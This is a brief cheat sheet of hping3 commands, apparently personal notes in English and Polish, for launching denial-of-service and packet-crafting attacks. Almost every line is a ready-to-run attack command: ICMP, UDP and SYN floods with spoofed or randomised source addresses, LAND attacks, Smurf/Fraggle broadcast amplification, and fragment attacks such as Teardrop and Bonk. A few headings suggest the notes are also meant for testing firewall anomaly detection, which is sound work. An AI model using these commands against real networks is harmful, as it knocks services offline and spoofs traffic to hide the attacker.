DDOS
hping3 -1 --flood 192.168.11.11 (target)  -a 192.168.11.10 (spoofed)

DDOS na http, random source IP
hping3 -c 100000 (numbers of packets to send) -d 120 (size of each packet) -S (SYN) -w 64 (windows size) -p 80 (http) --flood -rand-source Target


IP source Route options attack


DDOS session table flood


UDP Flood attack
hping3 --flood --rand-source --udp -445 IP

ICMP flood attack
hping3 --flood --rand-source --icmp -p 445 IP

DOS LAND ATTACK :)
hping3 192.168.11.11 -a 192.168.11.11 (IP musza być takie same) --icmp --flood

ICMP abnormalities detection
fragment ICMP and length bigger than 1024bytes:
hping3 192.168.0.102 -1 -a 0.0.0.0 -d 6000 (bytes)

IP packets fragments
hping3 192.168.11.10 -a 0.0.0.1 -f

SYN fragments
hping3 192.168.11.10 -a 0.0.0.1 -S -f (fragments)

ACK:
hping3 IP -A -c 5 -p 80



SYN:
hping3 IP -S -c 5 -p 80


Syn/ACK:
hping3 IP -SA -c 5 -p 80


ICMP flooding:
hping3 --icmp IP -d 65000


ICMP flooding with 0.0.0.1 like source
hping3 IP -1 -a 0.0.0.1 -d 60000



SYN flooding:
hping3 --rand-source IP -p 80 -S


LAND attack
hping3 IP -a IP --icmp --flood


Boing,Bonk, Teardrop
hping3 IP -a 1.1.1.1 --id 3200 -M 34340 -p 21 -d 320

Smurf,Fraggle
hping3 192.168.11.255 -a IP --icmp
-thats broadcast
